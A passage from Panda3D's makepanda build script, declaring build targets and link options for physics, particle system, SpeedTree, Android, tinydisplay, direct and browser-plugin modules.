TargetAdd('physx_module.obj', input='libpandaphysx.in')
TargetAdd('physx_module.obj', opts=OPTS)
TargetAdd('physx_module.obj', opts=['IMOD:panda3d.physx', 'ILIB:physx', 'IMPORT:panda3d.core'])
TargetAdd('physx.pyd', input='physx_module.obj')
TargetAdd('physx.pyd', input='libpandaphysx_igate.obj')
TargetAdd('physx.pyd', input='libpandaphysx.dll')
TargetAdd('physx.pyd', input='libp3interrogatedb.dll')
TargetAdd('physx.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('physx.pyd', opts=['PYTHON', 'WINUSER', 'PHYSX', 'NOARCH:PPC'])
#
# DIRECTORY: panda/src/physics/
#
if (PkgSkip("PANDAPHYSICS")==0) and (not RUNTIME):
OPTS=['DIR:panda/src/physics', 'BUILDING:PANDAPHYSICS']
TargetAdd('p3physics_composite1.obj', opts=OPTS, input='p3physics_composite1.cxx')
TargetAdd('p3physics_composite2.obj', opts=OPTS, input='p3physics_composite2.cxx')
OPTS=['DIR:panda/src/physics', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/physics', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("forces.h")
TargetAdd('libp3physics.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3physics.in', opts=['IMOD:panda3d.physics', 'ILIB:libp3physics', 'SRCDIR:panda/src/physics'])
TargetAdd('libp3physics_igate.obj', input='libp3physics.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/particlesystem/
#
if (PkgSkip("PANDAPHYSICS")==0) and (PkgSkip("PANDAPARTICLESYSTEM")==0) and (not RUNTIME):
OPTS=['DIR:panda/src/particlesystem', 'BUILDING:PANDAPHYSICS']
TargetAdd('p3particlesystem_composite1.obj', opts=OPTS, input='p3particlesystem_composite1.cxx')
TargetAdd('p3particlesystem_composite2.obj', opts=OPTS, input='p3particlesystem_composite2.cxx')
OPTS=['DIR:panda/src/particlesystem', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/particlesystem', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove('orientedParticle.h')
IGATEFILES.remove('orientedParticleFactory.h')
IGATEFILES.remove('particlefactories.h')
IGATEFILES.remove('emitters.h')
IGATEFILES.remove('particles.h')
TargetAdd('libp3particlesystem.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3particlesystem.in', opts=['IMOD:panda3d.physics', 'ILIB:libp3particlesystem', 'SRCDIR:panda/src/particlesystem'])
TargetAdd('libp3particlesystem_igate.obj', input='libp3particlesystem.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/pandaphysics/
#
if (PkgSkip("PANDAPHYSICS")==0) and (not RUNTIME):
OPTS=['DIR:panda/metalibs/pandaphysics', 'BUILDING:PANDAPHYSICS']
TargetAdd('pandaphysics_pandaphysics.obj', opts=OPTS, input='pandaphysics.cxx')
TargetAdd('libpandaphysics.dll', input='pandaphysics_pandaphysics.obj')
TargetAdd('libpandaphysics.dll', input='p3physics_composite1.obj')
TargetAdd('libpandaphysics.dll', input='p3physics_composite2.obj')
TargetAdd('libpandaphysics.dll', input='p3particlesystem_composite1.obj')
TargetAdd('libpandaphysics.dll', input='p3particlesystem_composite2.obj')
TargetAdd('libpandaphysics.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaphysics.dll', opts=['ADVAPI'])
OPTS=['DIR:panda/metalibs/pandaphysics', 'PYTHON']
TargetAdd('physics_module.obj', input='libp3physics.in')
if (PkgSkip("PANDAPARTICLESYSTEM")==0):
TargetAdd('physics_module.obj', input='libp3particlesystem.in')
TargetAdd('physics_module.obj', opts=OPTS)
TargetAdd('physics_module.obj', opts=['IMOD:panda3d.physics', 'ILIB:physics', 'IMPORT:panda3d.core'])
TargetAdd('physics.pyd', input='physics_module.obj')
TargetAdd('physics.pyd', input='libp3physics_igate.obj')
if (PkgSkip("PANDAPARTICLESYSTEM")==0):
TargetAdd('physics.pyd', input='libp3particlesystem_igate.obj')
TargetAdd('physics.pyd', input='libpandaphysics.dll')
TargetAdd('physics.pyd', input='libp3interrogatedb.dll')
TargetAdd('physics.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('physics.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/speedtree/
#
if (PkgSkip("SPEEDTREE")==0):
OPTS=['DIR:panda/src/speedtree', 'BUILDING:PANDASPEEDTREE', 'SPEEDTREE', 'PYTHON']
TargetAdd('pandaspeedtree_composite1.obj', opts=OPTS, input='pandaspeedtree_composite1.cxx')
IGATEFILES=GetDirectoryContents('panda/src/speedtree', ["*.h", "*_composite*.cxx"])
TargetAdd('libpandaspeedtree.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandaspeedtree.in', opts=['IMOD:libpandaspeedtree', 'ILIB:libpandaspeedtree', 'SRCDIR:panda/src/speedtree'])
TargetAdd('libpandaspeedtree_igate.obj', input='libpandaspeedtree.in', opts=["DEPENDENCYONLY"])
TargetAdd('libpandaspeedtree_module.obj', input='libpandaspeedtree.in')
TargetAdd('libpandaspeedtree_module.obj', opts=OPTS)
TargetAdd('libpandaspeedtree_module.obj', opts=['IMOD:libpandaspeedtree', 'ILIB:libpandaspeedtree'])
TargetAdd('libpandaspeedtree.dll', input='pandaspeedtree_composite1.obj')
TargetAdd('libpandaspeedtree.dll', input='libpandaspeedtree_igate.obj')
TargetAdd('libpandaspeedtree.dll', input='libpandaspeedtree_module.obj')
TargetAdd('libpandaspeedtree.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaspeedtree.dll', opts=['SPEEDTREE'])
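# Note (added): SDK["SPEEDTREEAPI"] records which renderer the SpeedTree SDK was built
# against, so the matching graphics link options are appended here.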
if SDK["SPEEDTREEAPI"] == 'OpenGL':
TargetAdd('libpandaspeedtree.dll', opts=['GL', 'NVIDIACG', 'CGGL'])
elif SDK["SPEEDTREEAPI"] == 'DirectX9':
TargetAdd('libpandaspeedtree.dll', opts=['DX9', 'NVIDIACG', 'CGDX9'])
#
# DIRECTORY: panda/src/testbed/
#
if (not RTDIST and not RUNTIME and PkgSkip("PVIEW")==0):
OPTS=['DIR:panda/src/testbed']
TargetAdd('pview_pview.obj', opts=OPTS, input='pview.cxx')
TargetAdd('pview.exe', input='pview_pview.obj')
TargetAdd('pview.exe', input='libp3framework.dll')
if not PkgSkip("EGG"):
TargetAdd('pview.exe', input='libpandaegg.dll')
TargetAdd('pview.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pview.exe', opts=['ADVAPI', 'WINSOCK2', 'WINSHELL'])
#
# DIRECTORY: panda/src/android/
#
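# Note (added): on Android the viewers are built as shared libraries (libpview/libppython)
# that PandaActivity/PythonActivity load through android_native_app_glue, rather than as
# standalone executables as on desktop platforms.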
if (not RUNTIME and GetTarget() == 'android'):
OPTS=['DIR:panda/src/android']
TargetAdd('org/panda3d/android/NativeIStream.class', opts=OPTS, input='NativeIStream.java')
TargetAdd('org/panda3d/android/NativeOStream.class', opts=OPTS, input='NativeOStream.java')
TargetAdd('org/panda3d/android/PandaActivity.class', opts=OPTS, input='PandaActivity.java')
TargetAdd('org/panda3d/android/PythonActivity.class', opts=OPTS, input='PythonActivity.java')
TargetAdd('p3android_composite1.obj', opts=OPTS, input='p3android_composite1.cxx')
TargetAdd('libp3android.dll', input='p3android_composite1.obj')
TargetAdd('libp3android.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3android.dll', opts=['JNIGRAPHICS'])
TargetAdd('android_native_app_glue.obj', opts=OPTS + ['NOHIDDEN'], input='android_native_app_glue.c')
TargetAdd('android_main.obj', opts=OPTS, input='android_main.cxx')
if (not RTDIST and PkgSkip("PVIEW")==0):
TargetAdd('libpview_pview.obj', opts=OPTS, input='pview.cxx')
TargetAdd('libpview.dll', input='android_native_app_glue.obj')
TargetAdd('libpview.dll', input='android_main.obj')
TargetAdd('libpview.dll', input='libpview_pview.obj')
TargetAdd('libpview.dll', input='libp3framework.dll')
if not PkgSkip("EGG"):
TargetAdd('libpview.dll', input='libpandaegg.dll')
TargetAdd('libpview.dll', input='libp3android.dll')
TargetAdd('libpview.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpview.dll', opts=['MODULE', 'ANDROID'])
if (not RTDIST and PkgSkip("PYTHON")==0):
OPTS += ['PYTHON']
TargetAdd('ppython_ppython.obj', opts=OPTS, input='python_main.cxx')
TargetAdd('libppython.dll', input='android_native_app_glue.obj')
TargetAdd('libppython.dll', input='android_main.obj')
TargetAdd('libppython.dll', input='ppython_ppython.obj')
TargetAdd('libppython.dll', input='libp3framework.dll')
TargetAdd('libppython.dll', input='libp3android.dll')
TargetAdd('libppython.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libppython.dll', opts=['MODULE', 'ANDROID', 'PYTHON'])
#
# DIRECTORY: panda/src/androiddisplay/
#
if (GetTarget() == 'android' and PkgSkip("EGL")==0 and PkgSkip("GLES")==0 and not RUNTIME):
DefSymbol('GLES', 'OPENGLES_1', '')
OPTS=['DIR:panda/src/androiddisplay', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES', 'GLES', 'EGL']
TargetAdd('pandagles_androiddisplay_composite1.obj', opts=OPTS, input='p3androiddisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagles', 'BUILDING:PANDAGLES', 'GLES', 'EGL']
TargetAdd('pandagles_pandagles.obj', opts=OPTS, input='pandagles.cxx')
TargetAdd('libpandagles.dll', input='pandagles_pandagles.obj')
TargetAdd('libpandagles.dll', input='p3glesgsg_config_glesgsg.obj')
TargetAdd('libpandagles.dll', input='p3glesgsg_glesgsg.obj')
TargetAdd('libpandagles.dll', input='pandagles_androiddisplay_composite1.obj')
TargetAdd('libpandagles.dll', input='libp3android.dll')
TargetAdd('libpandagles.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagles.dll', opts=['MODULE', 'GLES', 'EGL'])
#
# DIRECTORY: panda/src/tinydisplay/
#
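# Note (added): tinydisplay is the software renderer; it reuses whichever platform window
# glue applies (the OSX window code on macOS, libp3windisplay on Windows, or the
# x11display objects elsewhere).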
if (not RUNTIME and (GetTarget() in ('windows', 'darwin') or PkgSkip("X11")==0) and PkgSkip("TINYDISPLAY")==0):
OPTS=['DIR:panda/src/tinydisplay', 'BUILDING:TINYDISPLAY']
TargetAdd('p3tinydisplay_composite1.obj', opts=OPTS, input='p3tinydisplay_composite1.cxx')
TargetAdd('p3tinydisplay_composite2.obj', opts=OPTS, input='p3tinydisplay_composite2.cxx')
TargetAdd('p3tinydisplay_ztriangle_1.obj', opts=OPTS, input='ztriangle_1.cxx')
TargetAdd('p3tinydisplay_ztriangle_2.obj', opts=OPTS, input='ztriangle_2.cxx')
TargetAdd('p3tinydisplay_ztriangle_3.obj', opts=OPTS, input='ztriangle_3.cxx')
TargetAdd('p3tinydisplay_ztriangle_4.obj', opts=OPTS, input='ztriangle_4.cxx')
TargetAdd('p3tinydisplay_ztriangle_table.obj', opts=OPTS, input='ztriangle_table.cxx')
if GetTarget() == 'darwin':
TargetAdd('p3tinydisplay_tinyOsxGraphicsWindow.obj', opts=OPTS, input='tinyOsxGraphicsWindow.mm')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_tinyOsxGraphicsWindow.obj')
TargetAdd('libp3tinydisplay.dll', opts=['CARBON', 'AGL', 'COCOA'])
elif GetTarget() == 'windows':
TargetAdd('libp3tinydisplay.dll', input='libp3windisplay.dll')
TargetAdd('libp3tinydisplay.dll', opts=['WINIMM', 'WINGDI', 'WINKERNEL', 'WINOLDNAMES', 'WINUSER', 'WINMM'])
else:
TargetAdd('libp3tinydisplay.dll', input='p3x11display_composite1.obj')
TargetAdd('libp3tinydisplay.dll', opts=['X11'])
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_composite1.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_composite2.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_1.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_2.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_3.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_4.obj')
TargetAdd('libp3tinydisplay.dll', input='p3tinydisplay_ztriangle_table.obj')
TargetAdd('libp3tinydisplay.dll', input=COMMON_PANDA_LIBS)
#
# DIRECTORY: direct/src/directbase/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/directbase', 'PYTHON']
TargetAdd('p3directbase_directbase.obj', opts=OPTS+['BUILDING:DIRECT'], input='directbase.cxx')
#
# DIRECTORY: direct/src/dcparser/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/dcparser', 'WITHINPANDA', 'BISONPREFIX_dcyy', 'PYTHON']
CreateFile(GetOutputDir()+"/include/dcParser.h")
TargetAdd('p3dcparser_dcParser.obj', opts=OPTS, input='dcParser.yxx')
TargetAdd('dcParser.h', input='p3dcparser_dcParser.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3dcparser_dcLexer.obj', opts=OPTS, input='dcLexer.lxx')
TargetAdd('p3dcparser_composite1.obj', opts=OPTS, input='p3dcparser_composite1.cxx')
TargetAdd('p3dcparser_composite2.obj', opts=OPTS, input='p3dcparser_composite2.cxx')
OPTS=['DIR:direct/src/dcparser', 'WITHINPANDA', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/dcparser', ["*.h", "*_composite*.cxx"])
if "dcParser.h" in IGATEFILES: IGATEFILES.remove("dcParser.h")
if "dcmsgtypes.h" in IGATEFILES: IGATEFILES.remove('dcmsgtypes.h')
TargetAdd('libp3dcparser.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3dcparser.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3dcparser', 'SRCDIR:direct/src/dcparser'])
TargetAdd('libp3dcparser_igate.obj', input='libp3dcparser.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/deadrec/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/deadrec', 'BUILDING:DIRECT']
TargetAdd('p3deadrec_composite1.obj', opts=OPTS, input='p3deadrec_composite1.cxx')
OPTS=['DIR:direct/src/deadrec', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/deadrec', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3deadrec.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3deadrec.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3deadrec', 'SRCDIR:direct/src/deadrec'])
TargetAdd('libp3deadrec_igate.obj', input='libp3deadrec.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/distributed/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/distributed', 'DIR:direct/src/dcparser', 'WITHINPANDA', 'BUILDING:DIRECT', 'OPENSSL', 'PYTHON']
TargetAdd('p3distributed_config_distributed.obj', opts=OPTS, input='config_distributed.cxx')
TargetAdd('p3distributed_cConnectionRepository.obj', opts=OPTS, input='cConnectionRepository.cxx')
TargetAdd('p3distributed_cDistributedSmoothNodeBase.obj', opts=OPTS, input='cDistributedSmoothNodeBase.cxx')
OPTS=['DIR:direct/src/distributed', 'WITHINPANDA', 'OPENSSL', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/distributed', ["*.h", "*.cxx"])
TargetAdd('libp3distributed.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3distributed.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3distributed', 'SRCDIR:direct/src/distributed'])
TargetAdd('libp3distributed_igate.obj', input='libp3distributed.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/interval/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/interval', 'BUILDING:DIRECT']
TargetAdd('p3interval_composite1.obj', opts=OPTS, input='p3interval_composite1.cxx')
OPTS=['DIR:direct/src/interval', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/interval', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3interval.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3interval.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3interval', 'SRCDIR:direct/src/interval'])
TargetAdd('libp3interval_igate.obj', input='libp3interval.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/showbase/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/showbase', 'BUILDING:DIRECT']
TargetAdd('p3showbase_showBase.obj', opts=OPTS, input='showBase.cxx')
if GetTarget() == 'darwin':
TargetAdd('p3showbase_showBase_assist.obj', opts=OPTS, input='showBase_assist.mm')
OPTS=['DIR:direct/src/showbase', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/showbase', ["*.h", "showBase.cxx"])
TargetAdd('libp3showbase.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3showbase.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3showbase', 'SRCDIR:direct/src/showbase'])
TargetAdd('libp3showbase_igate.obj', input='libp3showbase.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/src/motiontrail/
#
if (PkgSkip("DIRECT")==0):
OPTS=['DIR:direct/src/motiontrail', 'BUILDING:DIRECT']
TargetAdd('p3motiontrail_cMotionTrail.obj', opts=OPTS, input='cMotionTrail.cxx')
TargetAdd('p3motiontrail_config_motiontrail.obj', opts=OPTS, input='config_motiontrail.cxx')
OPTS=['DIR:direct/src/motiontrail', 'PYTHON']
IGATEFILES=GetDirectoryContents('direct/src/motiontrail', ["*.h", "cMotionTrail.cxx"])
TargetAdd('libp3motiontrail.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3motiontrail.in', opts=['IMOD:panda3d.direct', 'ILIB:libp3motiontrail', 'SRCDIR:direct/src/motiontrail'])
TargetAdd('libp3motiontrail_igate.obj', input='libp3motiontrail.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: direct/metalibs/direct/
#
if (PkgSkip("DIRECT")==0):
TargetAdd('libp3direct.dll', input='p3directbase_directbase.obj')
TargetAdd('libp3direct.dll', input='p3showbase_showBase.obj')
if GetTarget() == 'darwin':
TargetAdd('libp3direct.dll', input='p3showbase_showBase_assist.obj')
TargetAdd('libp3direct.dll', input='p3deadrec_composite1.obj')
TargetAdd('libp3direct.dll', input='p3interval_composite1.obj')
TargetAdd('libp3direct.dll', input='p3motiontrail_config_motiontrail.obj')
TargetAdd('libp3direct.dll', input='p3motiontrail_cMotionTrail.obj')
TargetAdd('libp3direct.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3direct.dll', opts=['ADVAPI', 'OPENSSL', 'WINUSER', 'WINGDI'])
OPTS=['PYTHON']
TargetAdd('direct_module.obj', input='libp3dcparser.in')
TargetAdd('direct_module.obj', input='libp3showbase.in')
TargetAdd('direct_module.obj', input='libp3deadrec.in')
TargetAdd('direct_module.obj', input='libp3interval.in')
TargetAdd('direct_module.obj', input='libp3distributed.in')
TargetAdd('direct_module.obj', input='libp3motiontrail.in')
TargetAdd('direct_module.obj', opts=OPTS)
TargetAdd('direct_module.obj', opts=['IMOD:panda3d.direct', 'ILIB:direct', 'IMPORT:panda3d.core'])
TargetAdd('direct.pyd', input='libp3dcparser_igate.obj')
TargetAdd('direct.pyd', input='libp3showbase_igate.obj')
TargetAdd('direct.pyd', input='libp3deadrec_igate.obj')
TargetAdd('direct.pyd', input='libp3interval_igate.obj')
TargetAdd('direct.pyd', input='libp3distributed_igate.obj')
TargetAdd('direct.pyd', input='libp3motiontrail_igate.obj')
# These are part of direct.pyd, not libp3direct.dll, because they rely on
# the Python libraries. If a C++ user needs these modules, we can move them
# back and filter out the Python-specific code.
TargetAdd('direct.pyd', input='p3dcparser_composite1.obj')
TargetAdd('direct.pyd', input='p3dcparser_composite2.obj')
TargetAdd('direct.pyd', input='p3dcparser_dcParser.obj')
TargetAdd('direct.pyd', input='p3dcparser_dcLexer.obj')
TargetAdd('direct.pyd', input='p3distributed_config_distributed.obj')
TargetAdd('direct.pyd', input='p3distributed_cConnectionRepository.obj')
TargetAdd('direct.pyd', input='p3distributed_cDistributedSmoothNodeBase.obj')
TargetAdd('direct.pyd', input='direct_module.obj')
TargetAdd('direct.pyd', input='libp3direct.dll')
TargetAdd('direct.pyd', input='libp3interrogatedb.dll')
TargetAdd('direct.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('direct.pyd', opts=['PYTHON', 'OPENSSL', 'WINUSER', 'WINGDI', 'WINSOCK2'])
#
# DIRECTORY: direct/src/dcparse/
#
if (PkgSkip("PYTHON")==0 and PkgSkip("DIRECT")==0 and not RTDIST and not RUNTIME):
OPTS=['DIR:direct/src/dcparse', 'DIR:direct/src/dcparser', 'WITHINPANDA', 'ADVAPI', 'PYTHON']
TargetAdd('dcparse_dcparse.obj', opts=OPTS, input='dcparse.cxx')
TargetAdd('p3dcparse.exe', input='p3dcparser_composite1.obj')
TargetAdd('p3dcparse.exe', input='p3dcparser_composite2.obj')
TargetAdd('p3dcparse.exe', input='p3dcparser_dcParser.obj')
TargetAdd('p3dcparse.exe', input='p3dcparser_dcLexer.obj')
TargetAdd('p3dcparse.exe', input='dcparse_dcparse.obj')
TargetAdd('p3dcparse.exe', input='libp3direct.dll')
TargetAdd('p3dcparse.exe', input=COMMON_PANDA_LIBS)
TargetAdd('p3dcparse.exe', input='libp3pystub.lib')
TargetAdd('p3dcparse.exe', opts=['ADVAPI', 'PYTHON'])
#
# DIRECTORY: direct/src/plugin/
#
if (RTDIST or RUNTIME):
# Explicitly define this as we don't include dtool_config.h here.
if GetTarget() not in ('windows', 'darwin'):
DefSymbol("RUNTIME", "HAVE_X11", "1")
OPTS=['DIR:direct/src/plugin', 'BUILDING:P3D_PLUGIN', 'RUNTIME', 'OPENSSL']
TargetAdd('plugin_common.obj', opts=OPTS, input='plugin_common_composite1.cxx')
OPTS += ['ZLIB', 'MSIMG']
TargetAdd('plugin_plugin.obj', opts=OPTS, input='p3d_plugin_composite1.cxx')
TargetAdd('plugin_mkdir_complete.obj', opts=OPTS, input='mkdir_complete.cxx')
TargetAdd('plugin_wstring_encode.obj', opts=OPTS, input='wstring_encode.cxx')
TargetAdd('plugin_parse_color.obj', opts=OPTS, input='parse_color.cxx')
TargetAdd('plugin_get_twirl_data.obj', opts=OPTS, input='get_twirl_data.cxx')
TargetAdd('plugin_find_root_dir.obj', opts=OPTS, input='find_root_dir.cxx')
if GetTarget() == 'darwin':
TargetAdd('plugin_find_root_dir_assist.obj', opts=OPTS, input='find_root_dir_assist.mm')
TargetAdd('plugin_binaryXml.obj', opts=OPTS, input='binaryXml.cxx')
TargetAdd('plugin_fileSpec.obj', opts=OPTS, input='fileSpec.cxx')
TargetAdd('plugin_handleStream.obj', opts=OPTS, input='handleStream.cxx')
TargetAdd('plugin_handleStreamBuf.obj', opts=OPTS, input='handleStreamBuf.cxx')
if (RTDIST):
for fname in ("p3d_plugin.dll", "libp3d_plugin_static.ilb"):
TargetAdd(fname, input='plugin_plugin.obj')
TargetAdd(fname, input='plugin_mkdir_complete.obj')
TargetAdd(fname, input='plugin_wstring_encode.obj')
TargetAdd(fname, input='plugin_parse_color.obj')
TargetAdd(fname, input='plugin_find_root_dir.obj')
if GetTarget() == 'darwin':
TargetAdd(fname, input='plugin_find_root_dir_assist.obj')
TargetAdd(fname, input='plugin_fileSpec.obj')
TargetAdd(fname, input='plugin_binaryXml.obj')
TargetAdd(fname, input='plugin_handleStream.obj')
TargetAdd(fname, input='plugin_handleStreamBuf.obj')
TargetAdd(fname, input='libp3tinyxml.ilb')
if GetTarget() == 'darwin':
TargetAdd(fname, input='libp3subprocbuffer.ilb')
TargetAdd(fname, opts=['OPENSSL', 'ZLIB', 'X11', 'ADVAPI', 'WINUSER', 'WINGDI', 'WINSHELL', 'WINCOMCTL', 'WINOLE', 'MSIMG'])
TargetAdd("libp3d_plugin_static.ilb", input='plugin_get_twirl_data.obj')
if (PkgSkip("PYTHON")==0 and RTDIST):
# Freeze VFSImporter and its dependency modules into p3dpython.
# Mark panda3d.core as a dependency to make sure to build that first.
TargetAdd('p3dpython_frozen.obj', input='VFSImporter.py', opts=['DIR:direct/src/showbase', 'FREEZE_STARTUP', 'PYTHON'])
TargetAdd('p3dpython_frozen.obj', dep='core.pyd')
OPTS += ['PYTHON']
TargetAdd('p3dpython_p3dpython_composite1.obj', opts=OPTS, input='p3dpython_composite1.cxx')
TargetAdd('p3dpython_p3dPythonMain.obj', opts=OPTS, input='p3dPythonMain.cxx')
TargetAdd('p3dpython.exe', input='p3dpython_p3dpython_composite1.obj')
TargetAdd('p3dpython.exe', input='p3dpython_p3dPythonMain.obj')
TargetAdd('p3dpython.exe', input='p3dpython_frozen.obj')
TargetAdd('p3dpython.exe', input=COMMON_PANDA_LIBS)
TargetAdd('p3dpython.exe', input='libp3tinyxml.ilb')
TargetAdd('p3dpython.exe', input='libp3interrogatedb.dll')
TargetAdd('p3dpython.exe', opts=['PYTHON', 'WINUSER'])
TargetAdd('libp3dpython.dll', input='p3dpython_p3dpython_composite1.obj')
TargetAdd('libp3dpython.dll', input='p3dpython_frozen.obj')
TargetAdd('libp3dpython.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3dpython.dll', input='libp3tinyxml.ilb')
TargetAdd('libp3dpython.dll', input='libp3interrogatedb.dll')
TargetAdd('libp3dpython.dll', opts=['PYTHON', 'WINUSER'])
if GetTarget() == 'windows':
DefSymbol("NON_CONSOLE", "NON_CONSOLE", "")
OPTS.append("NON_CONSOLE")
TargetAdd('p3dpythonw_p3dpython_composite1.obj', opts=OPTS, input='p3dpython_composite1.cxx')
TargetAdd('p3dpythonw_p3dPythonMain.obj', opts=OPTS, input='p3dPythonMain.cxx')
TargetAdd('p3dpythonw.exe', input='p3dpythonw_p3dpython_composite1.obj')
TargetAdd('p3dpythonw.exe', input='p3dpythonw_p3dPythonMain.obj')
TargetAdd('p3dpythonw.exe', input='p3dpython_frozen.obj')
TargetAdd('p3dpythonw.exe', input=COMMON_PANDA_LIBS)
TargetAdd('p3dpythonw.exe', input='libp3tinyxml.ilb')
TargetAdd('p3dpythonw.exe', input='libp3interrogatedb.dll')
TargetAdd('p3dpythonw.exe', opts=['SUBSYSTEM:WINDOWS', 'PYTHON', 'WINUSER'])
if (PkgSkip("OPENSSL")==0 and RTDIST and False):
OPTS=['DIR:direct/src/plugin', 'DIR:panda/src/express', 'OPENSSL']
if GetTarget() == 'darwin':
OPTS += ['OPT:2']
if (PkgSkip("FLTK")==0):
OPTS.append("FLTK")
TargetAdd('plugin_p3dCert.obj', opts=OPTS, input='p3dCert.cxx')
TargetAdd('plugin_p3dCert_strings.obj', opts=OPTS, input='p3dCert_strings.cxx')
TargetAdd('p3dcert.exe', input='plugin_mkdir_complete.obj')
TargetAdd('p3dcert.exe', input='plugin_wstring_encode.obj')
TargetAdd('p3dcert.exe', input='plugin_p3dCert.obj')
TargetAdd('p3dcert.exe', input='plugin_p3dCert_strings.obj')
OPTS=['SUBSYSTEM:WINDOWS', 'OPENSSL', 'FLTK', 'X11', 'WINCOMCTL', 'WINSOCK', 'WINGDI', 'WINUSER', 'ADVAPI', 'WINOLE', 'WINSHELL']
if GetTarget() == 'darwin':
OPTS += ['OPT:2']
TargetAdd('p3dcert.exe', opts=OPTS)
elif (PkgSkip("WX")==0):
OPTS += ["WX", "RTTI"]
TargetAdd('plugin_p3dCert.obj', opts=OPTS, input='p3dCert_wx.cxx')
TargetAdd('p3dcert.exe', input='plugin_mkdir_complete.obj')
TargetAdd('p3dcert.exe', input='plugin_wstring_encode.obj')
TargetAdd('p3dcert.exe', input='plugin_p3dCert.obj')
OPTS=['SUBSYSTEM:WINDOWS', 'OPENSSL', 'WX', 'CARBON', 'WINOLE', 'WINOLEAUT', 'WINUSER', 'ADVAPI', 'WINSHELL', 'WINCOMCTL', 'WINGDI', 'WINCOMDLG']
if GetTarget() == "darwin":
OPTS += ['GL', 'OPT:2']
TargetAdd('p3dcert.exe', opts=OPTS)
#
# DIRECTORY: direct/src/plugin_npapi/
#
if RUNTIME:
OPTS=['DIR:direct/src/plugin_npapi', 'RUNTIME', 'GTK2']
if GetTarget() == 'windows':
nppanda3d_rc = {"name" : "Panda3D Game Engine Plug-in",
"version" : VERSION,
"description" : "Runs 3-D games and interactive applets",
"filename" : "nppanda3d.dll",
"mimetype" : "application/x-panda3d",
"extension" : "p3d",
"filedesc" : "Panda3D applet"}
TargetAdd('nppanda3d.res', opts=OPTS, winrc=nppanda3d_rc)
elif GetTarget() == 'darwin':
TargetAdd('nppanda3d.rsrc', opts=OPTS, input='nppanda3d.r')
OPTS += ['GTK2']
TargetAdd('plugin_npapi_nppanda3d_composite1.obj', opts=OPTS, input='nppanda3d_composite1.cxx')
TargetAdd('nppanda3d.plugin', input='plugin_common.obj')
TargetAdd('nppanda3d.plugin', input='plugin_parse_color.obj')
TargetAdd('nppanda3d.plugin', input='plugin_get_twirl_data.obj')
TargetAdd('nppanda3d.plugin', input='plugin_wstring_encode.obj')
TargetAdd('nppanda3d.plugin', input='plugin_npapi_nppanda3d_composite1.obj')
if GetTarget() == 'windows':
TargetAdd('nppanda3d.plugin', input='nppanda3d.res')
TargetAdd('nppanda3d.plugin', input='nppanda3d.def', ipath=OPTS)
elif GetTarget() == 'darwin':
TargetAdd('nppanda3d.plugin', input='nppanda3d.rsrc')
TargetAdd('nppanda3d.plugin', input='nppanda3d.plist', ipath=OPTS)
TargetAdd('nppanda3d.plugin', input='plugin_find_root_dir_assist.obj')
TargetAdd('nppanda3d.plugin', input='libp3tinyxml.ilb')
